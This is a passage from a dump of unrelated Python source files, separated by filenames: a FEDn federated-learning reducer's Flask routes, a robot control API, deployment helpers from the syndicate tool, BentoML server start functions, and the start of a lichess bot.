""" Add a combiner to the network. 
""" if self.control.state() == ReducerState.setup: return jsonify({'status': 'retry'}) # TODO check for get variables name = request.args.get('name', None) address = str(request.args.get('address', None)) port = request.args.get('port', None) # token = request.args.get('token') # TODO do validation if port is None or address is None or name is None: return "Please specify correct parameters." # Try to retrieve combiner from db combiner = self.control.network.get_combiner(name) if not combiner: # Create a new combiner import base64 certificate, key = self.certificate_manager.get_or_create(address).get_keypair_raw() cert_b64 = base64.b64encode(certificate) key_b64 = base64.b64encode(key) # TODO append and redirect to index. import copy combiner = CombinerInterface(self, name, address, port, copy.deepcopy(certificate), copy.deepcopy(key), request.remote_addr) self.control.network.add_combiner(combiner) combiner = self.control.network.get_combiner(name) ret = { 'status': 'added', 'certificate': combiner['certificate'], 'key': combiner['key'], 'storage': self.control.statestore.get_storage_backend(), 'statestore': self.control.statestore.get_config(), } return jsonify(ret) @app.route('/eula', methods=['GET', 'POST']) def eula(): for r in request.headers: print("header contains: {}".format(r), flush=True) return render_template('eula.html', configured=True) @app.route('/models', methods=['GET', 'POST']) def models(): if request.method == 'POST': # upload seed file uploaded_seed = request.files['seed'] if uploaded_seed: from io import BytesIO a = BytesIO() a.seek(0, 0) uploaded_seed.seek(0) a.write(uploaded_seed.read()) helper = self.control.get_helper() model = helper.load_model_from_BytesIO(a.getbuffer()) self.control.commit(uploaded_seed.filename, model) else: not_configured = self.check_configured() if not_configured: return not_configured h_latest_model_id = self.control.get_latest_model() model_info = self.control.get_model_info() return render_template('models.html', h_latest_model_id=h_latest_model_id, seed=True, model_info=model_info, configured=True) seed = True return redirect(url_for('models', seed=seed)) @app.route('/delete_model_trail', methods=['GET', 'POST']) def delete_model_trail(): if request.method == 'POST': from fedn.common.tracer.mongotracer import MongoTracer statestore_config = self.control.statestore.get_config() self.tracer = MongoTracer(statestore_config['mongo_config'], statestore_config['network_id']) try: self.control.drop_models() except: pass # drop objects in minio self.control.delete_bucket_objects() return redirect(url_for('models')) seed = True return redirect(url_for('models', seed=seed)) @app.route('/drop_control', methods=['GET', 'POST']) def drop_control(): if request.method == 'POST': self.control.statestore.drop_control() return redirect(url_for('control')) return redirect(url_for('control')) # http://localhost:8090/control?rounds=4&model_id=879fa112-c861-4cb1-a25d-775153e5b548 @app.route('/control', methods=['GET', 'POST']) def control(): not_configured = self.check_configured() if not_configured: return not_configured client = self.name state = ReducerStateToString(self.control.state()) logs = None refresh = True try: self.current_compute_context = self.control.get_compute_context() except: self.current_compute_context = None if self.current_compute_context == None or self.current_compute_context == '': return render_template('setup.html', client=client, state=state, logs=logs, refresh=False, message='No compute context is set. 
Please set one here <a href="/context">/context</a>') if self.control.state() == ReducerState.setup: return render_template('setup.html', client=client, state=state, logs=logs, refresh=refresh, message='Warning. Reducer is not base-configured. please do so with config file.') if self.control.state() == ReducerState.monitoring: return redirect( url_for('index', state=state, refresh=refresh, message="Reducer is in monitoring state")) if request.method == 'POST': timeout = float(request.form.get('timeout', 180)) rounds = int(request.form.get('rounds', 1)) task = (request.form.get('task', '')) clients_required = request.form.get('clients_required', 1) clients_requested = request.form.get('clients_requested', 8) # checking if there are enough clients connected to start! clients_available = 0 try: for combiner in self.control.network.get_combiners(): if combiner.allowing_clients(): combiner_state = combiner.report() nac = combiner_state['nr_active_clients'] clients_available = clients_available + int(nac) except Exception as e: pass if clients_available < clients_required: return redirect(url_for('index', state=state, message="Not enough clients available to start rounds.", message_type='warning')) validate = request.form.get('validate', False) if validate == 'False': validate = False helper_type = request.form.get('helper', 'keras') # self.control.statestore.set_framework(helper_type) latest_model_id = self.control.get_latest_model() config = {'round_timeout': timeout, 'model_id': latest_model_id, 'rounds': rounds, 'clients_required': clients_required, 'clients_requested': clients_requested, 'task': task, 'validate': validate, 'helper_type': helper_type} import threading threading.Thread(target=self.control.instruct, args=(config,)).start() # self.control.instruct(config) return redirect(url_for('index', state=state, refresh=refresh, message="Sent execution plan.", message_type='SUCCESS')) else: seed_model_id = None latest_model_id = None try: seed_model_id = self.control.get_first_model()[0] latest_model_id = self.control.get_latest_model() except Exception as e: pass return render_template('index.html', latest_model_id=latest_model_id, compute_package=self.current_compute_context, seed_model_id=seed_model_id, helper=self.control.statestore.get_framework(), validate=True, configured=True) client = self.name state = ReducerStateToString(self.control.state()) logs = None refresh = False return render_template('index.html', client=client, state=state, logs=logs, refresh=refresh, configured=True) @app.route('/assign') def assign(): """Handle client assignment requests. """ if self.control.state() == ReducerState.setup: return jsonify({'status': 'retry'}) name = request.args.get('name', None) combiner_preferred = request.args.get('combiner', None) if combiner_preferred: combiner = self.control.find(combiner_preferred) else: combiner = self.control.find_available_combiner() if combiner is None: return jsonify({'status': 'retry'}) ## Check that a framework has been selected prior to assigning clients. 
framework = self.control.statestore.get_framework() if not framework: return jsonify({'status': 'retry'}) client = { 'name': name, 'combiner_preferred': combiner_preferred, 'combiner': combiner.name, 'ip': request.remote_addr, 'status': 'available' } self.control.network.add_client(client) if combiner: import base64 cert_b64 = base64.b64encode(combiner.certificate) response = { 'status': 'assigned', 'host': combiner.address, 'ip': combiner.ip, 'port': combiner.port, 'certificate': str(cert_b64).split('\'')[1], 'model_type': self.control.statestore.get_framework() } return jsonify(response) elif combiner is None: return jsonify({'status': 'retry'}) return jsonify({'status': 'retry'}) @app.route('/infer') def infer(): if self.control.state() == ReducerState.setup: return "Error, not configured" result = "" try: self.control.set_model_id() except fedn.exceptions.ModelError: print("Failed to seed control.") return result def combiner_stats(): combiner_info = [] for combiner in self.control.network.get_combiners(): try: report = combiner.report() combiner_info.append(report) except: pass return combiner_info return False def create_map(): cities_dict = { 'city': [], 'lat': [], 'lon': [], 'country': [], 'name': [], 'role': [], 'size': [] } from fedn import get_data dbpath = get_data('geolite2/GeoLite2-City.mmdb') with geoip2.database.Reader(dbpath) as reader: for combiner in self.control.statestore.list_combiners(): try: response = reader.city(combiner['ip']) cities_dict['city'].append(response.city.name) r = 1.0 # Rougly 100km w = r * math.sqrt(numpy.random.random()) t = 2.0 * math.pi * numpy.random.random() x = w * math.cos(t) y = w * math.sin(t) lat = str(float(response.location.latitude) + x) lon = str(float(response.location.longitude) + y) cities_dict['lat'].append(lat) cities_dict['lon'].append(lon) cities_dict['country'].append(response.country.iso_code) cities_dict['name'].append(combiner['name']) cities_dict['role'].append('Combiner') cities_dict['size'].append(10) except geoip2.errors.AddressNotFoundError as err: print(err) with geoip2.database.Reader(dbpath) as reader: for client in self.control.statestore.list_clients(): try: response = reader.city(client['ip']) cities_dict['city'].append(response.city.name) cities_dict['lat'].append(response.location.latitude) cities_dict['lon'].append(response.location.longitude) cities_dict['country'].append(response.country.iso_code) cities_dict['name'].append(client['name']) cities_dict['role'].append('Client') # TODO: Optionally relate to data size cities_dict['size'].append(6) except geoip2.errors.AddressNotFoundError as err: print(err) config = self.control.statestore.get_config() cities_df = pd.DataFrame(cities_dict) if cities_df.empty: return False fig = px.scatter_geo(cities_df, lon="lon", lat="lat", projection="natural earth", color="role", size="size", hover_name="city", hover_data={"city": False, "lon": False, "lat": False, 'size': False, 'name': True, 'role': True}) fig.update_geos(fitbounds="locations", showcountries=True) fig.update_layout(title="FEDn network: {}".format(config['network_id'])) fig = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder) return fig @app.route('/metric_type', methods=['GET', 'POST']) def change_features(): feature = request.args['selected'] plot = Plot(self.control.statestore) graphJSON = plot.create_box_plot(feature) return graphJSON @app.route('/dashboard') def dashboard(): not_configured = self.check_configured() if not_configured: return not_configured plot = Plot(self.control.statestore) try: 
valid_metrics = plot.fetch_valid_metrics() box_plot = plot.create_box_plot(valid_metrics[0]) except Exception as e: valid_metrics = None box_plot = None print(e, flush=True) table_plot = plot.create_table_plot() # timeline_plot = plot.create_timeline_plot() timeline_plot = None clients_plot = plot.create_client_plot() return render_template('dashboard.html', show_plot=True, box_plot=box_plot, table_plot=table_plot, timeline_plot=timeline_plot, clients_plot=clients_plot, metrics=valid_metrics, configured=True ) @app.route('/network') def network(): not_configured = self.check_configured() if not_configured: return not_configured plot = Plot(self.control.statestore) round_time_plot = plot.create_round_plot() mem_cpu_plot = plot.create_cpu_plot() combiners_plot = plot.create_combiner_plot() map_plot = create_map() combiner_info = combiner_stats() return render_template('network.html', map_plot=map_plot, network_plot=True, round_time_plot=round_time_plot, mem_cpu_plot=mem_cpu_plot, combiners_plot=combiners_plot, combiner_info=combiner_info, configured=True ) @app.route('/config/download', methods=['GET']) def config_download(): chk_string = "" name = self.control.get_compute_context() if name is None or name == '': chk_string = '' else: file_path = os.path.join(UPLOAD_FOLDER, name) print("trying to get {}".format(file_path)) from fedn.utils.checksum import md5 try: sum = str(md5(file_path)) except FileNotFoundError as e: sum = '' chk_string = "checksum: {}".format(sum) network_id = self.network_id discover_host = self.name discover_port = self.port token = self.token ctx = """network_id: {network_id} controller: discover_host: {discover_host} discover_port: {discover_port} token: {token} {chk_string}""".format(network_id=network_id, discover_host=discover_host, discover_port=discover_port, token=token, chk_string=chk_string) from io import BytesIO from flask import send_file obj = BytesIO() obj.write(ctx.encode('UTF-8')) obj.seek(0) return send_file(obj, as_attachment=True, attachment_filename='client.yaml', mimetype='application/x-yaml') @app.route('/context', methods=['GET', 'POST']) @csrf.exempt # TODO fix csrf token to form posting in package.py def context(): # if self.control.state() != ReducerState.setup or self.control.state() != ReducerState.idle: # return "Error, Context already assigned!" reset = request.args.get('reset', None) # if reset is not empty then allow context re-set if reset: return render_template('context.html') if request.method == 'POST': if 'file' not in request.files: flash('No file part') return redirect(url_for('context')) file = request.files['file'] helper_type = request.form.get('helper', 'keras') # if user does not select file, browser also # submit an empty part without filename if file.filename == '': flash('No selected file') return redirect(url_for('context')) if file and allowed_file(file.filename): filename = secure_filename(file.filename) file_path = os.path.join(app.config['UPLOAD_FOLDER'], filename) file.save(file_path) if self.control.state() == ReducerState.instructing or self.control.state() == ReducerState.monitoring: return "Not allowed to change context while execution is ongoing." 
self.control.set_compute_context(filename, file_path) self.control.statestore.set_framework(helper_type) return redirect(url_for('control')) from flask import send_from_directory name = request.args.get('name', '') if name == '': name = self.control.get_compute_context() if name == None or name == '': return render_template('context.html') # There is a potential race condition here, if one client requests a package and at # the same time another one triggers a fetch from Minio and writes to disk. try: mutex = Lock() mutex.acquire() return send_from_directory(app.config['UPLOAD_FOLDER'], name, as_attachment=True) except: try: data = self.control.get_compute_package(name) file_path = os.path.join(app.config['UPLOAD_FOLDER'], name) with open(file_path, 'wb') as fh: fh.write(data) return send_from_directory(app.config['UPLOAD_FOLDER'], name, as_attachment=True) except: raise finally: mutex.release() return render_template('context.html') @app.route('/checksum', methods=['GET', 'POST']) def checksum(): #sum = '' name = request.args.get('name', None) if name == '' or name is None: name = self.control.get_compute_context() if name == None or name == '': return jsonify({}) file_path = os.path.join(UPLOAD_FOLDER, name) print("trying to get {}".format(file_path)) from fedn.utils.checksum import md5 try: sum = str(md5(file_path)) except FileNotFoundError as e: sum = '' data = {'checksum': sum} from flask import jsonify return jsonify(data) if self.certificate: print("trying to connect with certs {} and key {}".format(str(self.certificate.cert_path), str(self.certificate.key_path)), flush=True) app.run(host="0.0.0.0", port=self.port, ssl_context=(str(self.certificate.cert_path), str(self.certificate.key_path)))
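# Illustrative sketch (not part of restservice.py): a client asking the reducer's
# /assign endpoint for a combiner, mirroring the route defined above. The reducer
# host, port and client name are assumptions made for this example.
import requests

def request_assignment(reducer_host="localhost", reducer_port=8090, name="client-1"):
    """Call /assign and return the assignment, or None if the reducer says 'retry'."""
    url = "http://{}:{}/assign".format(reducer_host, reducer_port)
    data = requests.get(url, params={"name": name}).json()
    if data.get("status") == "retry":
        # Reducer still in setup, no combiner available, or no framework selected yet.
        return None
    # On success the response carries host, ip, port, certificate and model_type.
    return data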
main.py
import threading from time import sleep, time from math import radians, degrees, atan2, sin, cos, sqrt import serial from flask import Flask, request from flask_restful import Api, Resource, reqparse import pigpio from BlindBot.driver import Omni3Wheel from BlindBot.gps import GPS from BlindBot.sonar import Sonar from MPU9250.mpu9250 import MPU9250 from PyYDLidar.PyYDLidar import LaserScan, YDLidarX4 app = Flask(__name__) api = Api(app) sleep(10) # @app.before_first_request # def initialize(): # pass class Robot: def __init__(self): self.pi = pigpio.pi() self._isRunning = False self._thread_buzzer = threading.Thread(target=self._func_buzzer) self._buzzer_freq = 0.0 self._thread_drive = threading.Thread(target=self._func_drive) self._drive_speed = [0.0, 0.0, 0.0] self._thread_gps_ultra = threading.Thread(target=self._func_gps_ultra) self._gps_isOk = False self._gps_location = None self._range_ultra = 0.0 self._thread_imu = threading.Thread(target=self._func_imu) self._imu_head = 0.0 self._thread_control = threading.Thread(target=self._func_control) self._control_flag = False self._target_head = 0.0 self._target_speed = 0.0 self._target_dist = 0.0 self._thread_lidar = threading.Thread(target=self._func_lidar) self._lidar_detect = [0, 0, 0] self._ultra_buzzer_enable = True self._ultra_threshold_stop = 150 # cm self._ultra_sound_freq = 0.85 # % 0.0 -> 1.0 self._lidar_enable = False self._threshold_side = 0.5 self._threshold_front = 0.7 self._speed = 0.2 def run(self): self._isRunning = True self._thread_buzzer.start() self._buzzer_freq = 0.95 sleep(0.5) self._buzzer_freq = 0 self._thread_drive.start() self._thread_gps_ultra.start() self._thread_imu.start() self._thread_control.start() self._thread_lidar.start() def stop(self): self._isRunning = False self._control_flag = False def _func_buzzer(self): buzzState = False buzz_pin = 23 while self._isRunning: self._buzzer_freq = max(0, min(1.0, self._buzzer_freq)) if self._buzzer_freq <= 0.03: buzzState = False self.pi.write(buzz_pin, buzzState) sleep(0.25) elif self._buzzer_freq >= 0.97: buzzState = True self.pi.write(buzz_pin, buzzState) sleep(0.25) else: buzzState = not buzzState self.pi.write(buzz_pin, buzzState) sleep(1.0-1.0*self._buzzer_freq) self.pi.write(buzz_pin, 0) def _func_drive(self): base = Omni3Wheel(self.pi, (13, 6, 5), (19, 26, 21), (12, 16, 20), 0.05, 0.15, (0.1, 0.1, 0.1)) while self._isRunning: base.drive(self._drive_speed) sleep(0.1) base.drive((0, 0, 0)) def _func_gps_ultra(self): gps = GPS("/dev/ttyS0") sonar_trig = 27 sonar_echo = 22 sonar = Sonar(self.pi, sonar_trig, sonar_echo) while self._isRunning: self._range_ultra = sonar.getDist() lat, lon = gps.read_GPS() if lat == 0 or lon == 0: self._gps_isOk = False continue self._gps_isOk = True if self._gps_location == None: self._gps_location = [lat, lon] else: self._gps_location[0] = lat * 0.5 + self._gps_location[0]*0.5 self._gps_location[1] = lon * 0.5 + self._gps_location[1]*0.5 # print(self._gps_location) sonar.cancel() def _func_imu(self): imu = MPU9250() imu.initMPU9250() imu.initAK8963() last_data = time() _roll = None _pitch = None _yaw = None while self._isRunning: accel = imu.data_accel gyro = imu.data_gyro mag = imu.data_mag pitch = atan2(accel[1], sqrt( (accel[0]*accel[0])+(accel[2]*accel[2]))) roll = atan2(-accel[0], sqrt((accel[1]*accel[1]) + (accel[2]*accel[2]))) current_data = time() dt = current_data - last_data last_data = current_data if _roll == None: _roll = roll if _pitch == None: _pitch = pitch _roll = 0.85*(_roll+gyro[0]*dt) + 0.1*_roll + 0.05*roll 
_pitch = 0.85*(_pitch+gyro[1]*dt) + 0.1*_pitch + 0.05*roll Yh = (mag[1] * cos(_roll)) - (mag[2]*sin(_roll)) Xh = (mag[0] * cos(_pitch)) + (mag[1] * sin(_roll) * sin(_pitch)) + (mag[2] * cos(roll)*sin(_pitch)) _yaw = atan2(Yh, Xh) self._imu_head = degrees(_yaw) # print(self._imu_head) sleep(0.01) def _func_lidar(self): self._lidar_detect = [0, 0, 0] lidar = YDLidarX4("/dev/ttyLidar") lidar.startScanning() sleep(3) gen = lidar.getScanData() while self._isRunning: dF = [[], [], []] for point in next(gen): if point.dist > 0.05: p_ang = round(degrees(point.angle)) + 180 if p_ang > 35 and p_ang < 95: dF[0].append(point.dist) elif p_ang > 350 or p_ang < 10: dF[1].append(point.dist) elif p_ang > 235 and p_ang < 325: dF[2].append(point.dist) if dF[0] != []: if min(dF[0]) < self._threshold_side: self._lidar_detect[0] = 1 # min(dF[0]) else: self._lidar_detect[0] = 0 if dF[1] != []: # print(dF[1]) if min(dF[1]) < self._threshold_front: self._lidar_detect[1] = 1 # min(dF[1]) else: self._lidar_detect[1] = 0 if dF[2] != []: if min(dF[2]) < self._threshold_side: self._lidar_detect[2] = 1 # min(dF[2]) else: self._lidar_detect[2] = 0 lidar.stopScanning() def _func_control(self): self._control_flag = False while self._isRunning: if self._control_flag: compass_diff = radians( self._target_head+94 - self._imu_head) turn = atan2(sin(compass_diff), cos(compass_diff)) self._speed = self._target_speed vx = self._speed w = max(min(-turn * 1.5, 0.6), -0.6) # print(turn, w) if abs(degrees(turn)) < 15: vx = self._speed vy = 0.0 if self._lidar_enable: if self._lidar_detect[0] and self._lidar_detect[2]: vy = 0.0 elif self._lidar_detect[0]: vy = -0.1 elif self._lidar_detect[2]: vy = 0.1 if self._lidar_detect[1]: vx = 0.0 if self._ultra_buzzer_enable: # print(self._range_ultra) if self._range_ultra > 10 and self._range_ultra < self._ultra_threshold_stop: self._buzzer_freq = self._ultra_sound_freq vx = 0.0 vy = 0.0 w = 0.0 else: self._buzzer_freq = 0.0 self._drive_speed = (vx, vy, w) print(self._lidar_detect) # print(self._drive_speed) # print((vx, vy, w)) sleep(0.05) self._drive_speed = [0, 0, 0] robot = Robot() # Robot Speed robot._speed = 0.2 # % 0.0 -> 1.0 # Ultrasonic and Buzzer robot._ultra_buzzer_enable = True robot._ultra_threshold_stop = 60 # cm robot._ultra_sound_freq = 0.85 # % 0.0 -> 1.0 # Lidar Enable robot._lidar_enable = True robot._threshold_side = 0.5 # m robot._threshold_front = 0.7 # m ####### robot.run() class RobotAPI(Resource): def __init__(self): self.parser = reqparse.RequestParser() self.parser.add_argument('Heading', type=float) self.parser.add_argument('Speed', type=float) self.parser.add_argument('BuzzerFrq', type=float) self.parser.add_argument('DriveSpeed', action='split', type=float) self.parser.add_argument('DriveX', type=float) self.parser.add_argument('DriveY', type=float) super().__init__() def get(self, id=None): if id == 201: ret = { 'GPS': robot._gps_location if robot._gps_isOk else [0, 0] } return ret, 201 elif id == 220: robot._control_flag = False robot._drive_speed = [0, 0, 0] return "OK", 220 # 'Sonar': robot._range_ultra, # 'IMU': degrees(robot.gggg) return "FAIL", 601 def post(self, id): if id == 221: args = self.parser.parse_args() robot._target_head = args['Heading'] robot._target_speed = args['Speed'] robot._control_flag = True return "OK", 221 return None def put(self, id): ret = {} code = 200 if id == "head": args = self.parser.parse_args() if args.get('Head') != None: robot._target_head = args['Head'] robot._control_flag = True elif id == "data": 
parser.add_argument('TargetHead', type=float) parser.add_argument('TargetDist', type=float) args = parser.parse_args() if args.get('TargetHead') != None: robot._target_head = args['TargetHead'] if args.get('TargetDist') != None: robot._target_dist = args['TargetDist'] code = 609 elif id == "command": args = self.parser.parse_args() if args.get('BuzzerFrq') != None: robot._buzzer_freq = args['BuzzerFrq'] if args.get('DriveSpeed') != None: robot._drive_speed = args['DriveSpeed'] else: if args.get('DriveX') != None: robot._drive_speed[0] = args['DriveX'] if args.get('DriveY') != None: robot._drive_speed[1] = args['DriveY'] robot._control_flag = False code = 610 return ret, code api.add_resource(RobotAPI, '/', '/<int:id>') if __name__ == "__main__": app.run(host="192.168.4.1", debug=False) robot.stop()
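# Illustrative sketch (not part of main.py): a small client for the RobotAPI above,
# using the integer routes it registers ('/<int:id>'). The robot address comes from
# the app.run() call; the heading and speed values are assumptions for the example.
import requests

ROBOT_BASE = "http://192.168.4.1"

def read_gps():
    """GET /201 returns {'GPS': [lat, lon]}, or [0, 0] while there is no fix."""
    return requests.get(ROBOT_BASE + "/201").json()

def drive_towards(heading_deg, speed):
    """POST /221 sets the target heading/speed and enables the control loop."""
    requests.post(ROBOT_BASE + "/221", data={"Heading": heading_deg, "Speed": speed})

def stop_robot():
    """GET /220 disables the control loop and zeroes the drive speed."""
    requests.get(ROBOT_BASE + "/220")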
helper.py
""" Copyright 2018 EPAM Systems, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import concurrent.futures import datetime import json import os import subprocess import sys from concurrent.futures import ALL_COMPLETED, ThreadPoolExecutor from functools import wraps from threading import Thread from time import time from click import BadParameter from tqdm import tqdm from syndicate.commons.log_helper import get_logger from syndicate.core import CONFIG, CONN from syndicate.core.conf.config_holder import path_resolver from syndicate.core.constants import (ARTIFACTS_FOLDER, BUILD_META_FILE_NAME, DEFAULT_SEP) _LOG = get_logger('syndicate.core.helper') def create_pool(func, args, workers=None, *kwargs): """ Create resources in pool in sub processes. :type args: iterable :type func: func """ executor = ThreadPoolExecutor(workers) if workers else ThreadPoolExecutor() try: futures = [executor.submit(func, i, kwargs) for i in args] concurrent.futures.wait(futures, return_when=ALL_COMPLETED) responses = {} for future in futures: result = future.result() if result: responses.update(result) return responses finally: executor.shutdown(wait=True) def unpack_kwargs(handler_func): """ Decorator for unpack kwargs. :type handler_func: func :param handler_func: function which will be decorated """ @wraps(handler_func) def wrapper(*kwargs): """ Wrapper func.""" return handler_func(**kwargs[0]) return wrapper def exit_on_exception(handler_func): """ Decorator to catch all exceptions and fail stage execution :type handler_func: func :param handler_func: function which will be decorated """ @wraps(handler_func) def wrapper(*args, **kwargs): """ Wrapper func.""" try: return handler_func(*args, **kwargs) except Exception as e: _LOG.error("Error occurred: %s", str(e)) sys.exit(1) return wrapper def prettify_json(obj): return json.dumps(obj, indent=4) def cli_command(handler_func): @wraps(handler_func) def wrapper(*args, **kwargs): status_code = handler_func(*args, **kwargs) if status_code != 0: _LOG.error('Execution is failed') sys.exit(1) return wrapper @cli_command def execute_command_by_path(command, path): return subprocess.call(command, shell=True, cwd=path) @cli_command def execute_command(command): return subprocess.call(command, shell=True) def build_path(*paths): return DEFAULT_SEP.join(paths) def _find_alias_and_replace(some_string): """ Find placeholder for alias in string. If found - replace with alias value. :type some_string: str """ first_index = some_string.index('${') second_index = some_string.index('}') alias_name = some_string[first_index + 2:second_index] res_alias = CONFIG.resolve_alias(alias_name) if not res_alias: raise AssertionError('Can not found alias for {0}'.format(alias_name)) result = ( some_string[:first_index] + res_alias + some_string[ second_index + 1:]) return result def resolve_aliases_for_string(string_value): """ Look for aliases in string. 
:type string_value: str """ input_string = string_value try: if '${' in string_value: if string_value.count('${') == string_value.count('}'): while True: input_string = _find_alias_and_replace(input_string) else: raise AssertionError('Broken alias in value: {0}.'.format( string_value)) return input_string except ValueError: return input_string def check_required_param(ctx, param, value): if not value: raise BadParameter('Parameter is required') return value def resolve_path_callback(ctx, param, value): if not value: raise BadParameter('Parameter is required') return path_resolver(value) def create_bundle_callback(ctx, param, value): bundle_path = os.path.join(CONFIG.project_path, ARTIFACTS_FOLDER, value) if not os.path.exists(bundle_path): os.makedirs(bundle_path) return value def verify_bundle_callback(ctx, param, value): bundle_path = os.path.join(CONFIG.project_path, ARTIFACTS_FOLDER, value) if not os.path.exists(bundle_path): raise AssertionError("Bundle name does not exist. Please, invoke " "'build_artifacts' command to create a bundle.") return value def verify_meta_bundle_callback(ctx, param, value): bundle_path = os.path.join(CONFIG.project_path, ARTIFACTS_FOLDER, value) build_meta_path = os.path.join(bundle_path, BUILD_META_FILE_NAME) if not os.path.exists(build_meta_path): raise AssertionError( "Bundle name is incorrect. {0} does not exist. Please, invoke " "'package_meta' command to create a file.".format( BUILD_META_FILE_NAME)) return value def write_content_to_file(file_path, file_name, obj): file_name = os.path.join(file_path, file_name) if os.path.exists(file_name): _LOG.warn('{0} already exists'.format(file_name)) else: with open(file_name, 'w') as meta_file: json.dump(obj, meta_file) _LOG.info('{0} file was created.'.format(meta_file.name)) def timeit(handler_func): @wraps(handler_func) def timed(*args, **kwargs): ts = time() result = handler_func(*args, **kwargs) te = time() _LOG.info('Stage %s, elapsed time: %s', handler_func.__name__, str(datetime.timedelta(seconds=te - ts))) return result return timed def execute_parallel_tasks(*fns): threads = [] for fn in fns: t = Thread(target=fn) t.start() threads.append(t) for t in threads: t.join() def handle_futures_progress_bar(futures): kwargs = { 'total': len(futures), 'unit': 'nap', 'leave': True } for _ in tqdm(concurrent.futures.as_completed(futures), **kwargs): pass def check_deploy_name_for_duplicates(func): """ Checks whether output file with specified name already exists. Everywhere this decorator is used the following :param func: :return: """ @wraps(func) def real_wrapper(*args, **kwargs): deploy_name = kwargs.get('deploy_name') bundle_name = kwargs.get('bundle_name') replace_output = kwargs.get('replace_output') if deploy_name and bundle_name and not replace_output: output_file_name = '{}/outputs/{}.json'.format(bundle_name, deploy_name) exists = CONN.s3().is_file_exists( CONFIG.deploy_target_bucket, key=output_file_name) if exists: _LOG.warn('Output file already exists with name {}.' ' If it should be replaced with new one, ' 'use --replace_output flag.'.format( output_file_name)) return return func(*args, **kwargs) return real_wrapper
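# Illustrative sketch (not part of helper.py): create_pool expects an iterable of
# argument dicts together with a function decorated with unpack_kwargs, so each dict
# is unpacked into keyword arguments inside a worker thread. The import assumes the
# syndicate package above is installed and configured; the function and bucket names
# are made up for the example and nothing real is created.
from syndicate.core.helper import create_pool, unpack_kwargs

@unpack_kwargs
def describe_bucket(name, region):
    # Each worker returns a dict; create_pool merges them into a single response dict.
    return {name: region}

responses = create_pool(describe_bucket,
                        [{'name': 'artifacts', 'region': 'eu-west-1'},
                         {'name': 'backups', 'region': 'us-east-1'}],
                        workers=2)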
__init__.py
import logging from typing import NoReturn, Optional from simple_di import skip, sync_container from ..configuration.containers import BentoMLContainer logger = logging.getLogger(__name__) # TODO: def serve( bundle_path_or_tag: str, port: Optional[int] = None, max_batch_size: Optional[int] = None, max_latency: Optional[int] = None, run_with_ngrok: Optional[bool] = None, ): pass def start_dev_server( bundle_path: str, port: Optional[int] = None, mb_max_batch_size: Optional[int] = None, mb_max_latency: Optional[int] = None, run_with_ngrok: Optional[bool] = None, enable_swagger: Optional[bool] = None, timeout: Optional[int] = None, ): BentoMLContainer.bundle_path.set(bundle_path) bento_server = BentoMLContainer.config.bento_server bento_server.port.set(port or skip) bento_server.timeout.set(timeout or skip) bento_server.microbatch.timeout.set(timeout or skip) bento_server.swagger.enabled.set(enable_swagger or skip) bento_server.microbatch.max_batch_size.set(mb_max_batch_size or skip) bento_server.microbatch.max_latency.set(mb_max_latency or skip) BentoMLContainer.prometheus_lock.get() # generate lock before fork BentoMLContainer.forward_port.get() # generate port before fork if run_with_ngrok: from threading import Timer from ..utils.flask_ngrok import start_ngrok thread = Timer(1, start_ngrok, args=(port,)) thread.setDaemon(True) thread.start() import multiprocessing model_server_proc = multiprocessing.Process( target=_start_dev_server, args=(BentoMLContainer,), daemon=True, ) model_server_proc.start() try: _start_dev_proxy(BentoMLContainer) finally: model_server_proc.terminate() def start_prod_server( bundle_path: str, port: Optional[int] = None, workers: Optional[int] = None, timeout: Optional[int] = None, enable_swagger: Optional[bool] = None, mb_max_batch_size: Optional[int] = None, mb_max_latency: Optional[int] = None, microbatch_workers: Optional[int] = None, ): import psutil assert ( psutil.POSIX ), "BentoML API Server production mode only supports POSIX platforms" BentoMLContainer.bundle_path.set(bundle_path) bento_server = BentoMLContainer.config.bento_server bento_server.port.set(port or skip) bento_server.timeout.set(timeout or skip) bento_server.microbatch.timeout.set(timeout or skip) bento_server.workers.set(workers or skip) bento_server.swagger.enabled.set(enable_swagger or skip) bento_server.microbatch.workers.set(microbatch_workers or skip) bento_server.microbatch.max_batch_size.set(mb_max_batch_size or skip) bento_server.microbatch.max_latency.set(mb_max_latency or skip) BentoMLContainer.prometheus_lock.get() # generate lock before fork BentoMLContainer.forward_port.get() # generate port before fork import multiprocessing model_server_job = multiprocessing.Process( target=_start_prod_server, args=(BentoMLContainer,), daemon=True ) model_server_job.start() try: _start_prod_proxy(BentoMLContainer) finally: model_server_job.terminate() def _start_dev_server(container) -> NoReturn: sync_container(container, BentoMLContainer) BentoMLContainer.model_app.get().run() assert False, "not reachable" def _start_dev_proxy(container) -> NoReturn: sync_container(container, BentoMLContainer) BentoMLContainer.proxy_app.get().run() assert False, "not reachable" def _start_prod_server(container) -> NoReturn: sync_container(container, BentoMLContainer) BentoMLContainer.model_server.get().run() assert False, "not reachable" def _start_prod_proxy(container) -> NoReturn: sync_container(container, BentoMLContainer) BentoMLContainer.proxy_server.get().run() assert False, "not reachable"
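# Illustrative sketch (not part of the module above): starting the development server
# for a saved bundle. The bundle path and port are assumptions; the keyword names
# mirror start_dev_server's signature defined above.
start_dev_server(
    bundle_path="/tmp/my_bento_bundle",  # hypothetical location of a saved bundle
    port=5000,
    enable_swagger=True,
    run_with_ngrok=False,
)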
lichess-bot.py
import argparse import chess from chess.variant import find_variant import chess.polyglot import engine_wrapper import model import json import lichess import logging import multiprocessing import traceback import logging_pool import signal import sys import time import backoff from config import load_config from conversation import Conversation, ChatLine from functools import partial from requests.exceptions import ChunkedEncodingError, ConnectionError, HTTPError from urllib3.exceptions import ProtocolError from ColorLogger import enable_color_logging logger = logging.getLogger(__name__) try: from http.client import RemoteDisconnected # New in version 3.5: Previously, BadStatusLine('') was raised. except ImportError: from http.client import BadStatusLine as RemoteDisconnected __version__ = "1.1.4" terminated = False def signal_handler(signal, frame): global terminated logger.debug("Recieved SIGINT. Terminating client.") terminated = True signal.signal(signal.SIGINT, signal_handler) def is_final(exception): return isinstance(exception, HTTPError) and exception.response.status_code < 500 def upgrade_account(li): if li.upgrade_to_bot_account() is None: return False logger.info("Succesfully upgraded to Bot Account!") return True @backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final) def 